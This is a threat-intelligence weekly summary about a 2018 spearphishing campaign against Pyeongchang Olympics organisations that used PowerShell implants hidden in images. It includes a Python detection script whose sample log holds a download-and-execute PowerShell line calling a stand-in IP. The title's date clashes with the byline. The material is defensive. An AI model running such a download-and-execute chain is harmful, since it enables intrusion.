Global Weekly Executive Summary, 09 FEB 2017

By MDL on February 9, 2018

Spearphishing the Olympics

A recent report by security software company McAfee reveals that unknown hackers launched a spearphishing campaign targeting organizations preparing for the 2018 Winter Olympics in Pyeongchang, South Korea.

The primary targets were groups affiliated with ice hockey that provided infrastructure or served in some other supporting role, but the McAfee report continues, “The attackers appear to be casting a wide net with this campaign.”

The first documented phishing email was sent on December 22, 2017, seven weeks before the opening ceremonies, at a time when Olympics preparations were ongoing. The phishing emails were addressed to icehockey@pyeongchang2018.com with several organizations included in the BCC field. The sender’s address was spoofed to indicate that it came from the National Counter-Terrorism Center of South Korea, an organization that was conducting anti-terror drills in preparation for the Olympics at that time.

According to McAfee, the emails actually came from an IP address in Singapore. The email was written in Korean and instructed readers to open a text document titled “Organized by the Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics.” After opening the file, a message written in English and repeated in Korean asks the user to “enable content to adjust this document to your version of Microsoft Word.”

The malicious document launches a PowerShell script when the user clicks “Enable Content.” The PowerShell script “downloads and reads an image file from a remote location and carves out a hidden PowerShell implant script embedded within the image file to execute.” The image hiding the PowerShell script was created with the open-source steganography tool Invoke-PSImage. The purpose of the PowerShell implant is to establish communication with the attacker’s server and collect “basic system-level data.”
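The chain described above (macro-launched PowerShell fetching an image, reading its pixels, and executing the script carved out of it) has a recognizable shape in PowerShell script-block logging. The following is an added detection example, not code from the McAfee report; the indicator patterns and the sample log entries are constructed assumptions, not the campaign’s actual commands.

```python
import re

# Indicator groups modelled on the three stages the post describes:
# fetch a remote image, read its pixel data, execute the carved script.
# These patterns are illustrative assumptions, not the real campaign's commands.
INDICATORS = {
    "image_download": re.compile(
        r"(downloadfile|downloaddata|downloadstring|invoke-webrequest|iwr|openread)\b"
        r".*\.(png|jpe?g|bmp|gif)\b", re.I),
    "pixel_access": re.compile(r"(system\.drawing|bitmap|getpixel|lockbits|fromfile)", re.I),
    "dynamic_exec": re.compile(r"(invoke-expression|\biex\b|\[scriptblock\]::create)", re.I),
}


def score_scriptblock(text: str) -> dict:
    """Return which indicator groups fire for one script-block log entry."""
    return {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}


def is_image_carve_chain(text: str) -> bool:
    """Flag only when all three stages appear together.

    Requiring the full combination keeps ordinary image downloads or ordinary
    image processing in admin scripts from alerting on their own.
    """
    return all(score_scriptblock(text).values())


def scan(entries) -> list:
    """Return the indices of entries that match the full chain."""
    return [i for i, e in enumerate(entries) if is_image_carve_chain(e)]


# Constructed sample entries standing in for PowerShell script-block log text.
SAMPLE_LOGS = [
    # benign: fetches an image and saves it, no pixel carving or execution
    "(New-Object Net.WebClient).DownloadFile('https://intranet.example/logo.png','C:\\tmp\\logo.png')",
    # benign: image processing in an admin script, no download or dynamic execution
    "$bmp = [System.Drawing.Bitmap]::FromFile('C:\\tmp\\logo.png'); $bmp.Width",
    # suspicious: full chain, download -> read pixels -> execute carved text
    "$wc=New-Object Net.WebClient; $img=$wc.DownloadData('http://203.0.113.5/banner.png'); "
    "$b=[System.Drawing.Bitmap]::new([IO.MemoryStream]$img); Invoke-Expression $script",
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(f"entry {i} matches image-carve chain: {score_scriptblock(SAMPLE_LOGS[i])}")
```

In practice the entries would come from Event ID 4104 script-block logs; a single-stage hit is worth keeping as context, but only the full combination should page anyone.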

The McAfee report describes further implants used to gain persistence, gather data, and capture keystrokes. The implants are called Gold Dragon, Brave Prince, Ghost419, and RunningRAT. Gold Dragon and Brave Prince are Korean-language implants.

A notable detail in the McAfee report is that steganography was used in some cases. This is the second mention of steganography in recent weeks. Last week, a Motherboard article detailed a custom-made encryption app called Muslim Crypt, used in the Middle East, that allows users to hide messages in an image file.

Ice hockey plays an important role in North and South Korean relations at these Olympics. In January, the North and South Korean governments announced that they would field a joint women’s hockey team, the first team combining athletes from both countries to appear at the Olympics. North and South Korean athletes marched in the Olympic Opening Ceremonies under a unified flag.

Sources:

McAfee, Malicious Document Targets Pyeongchang Olympics

Motherboard, This Custom-Made Jihadi Encryption App Hides Messages in Images

New York Times, Olympics Open With Koreas Marching Together, Offering Hope for Peace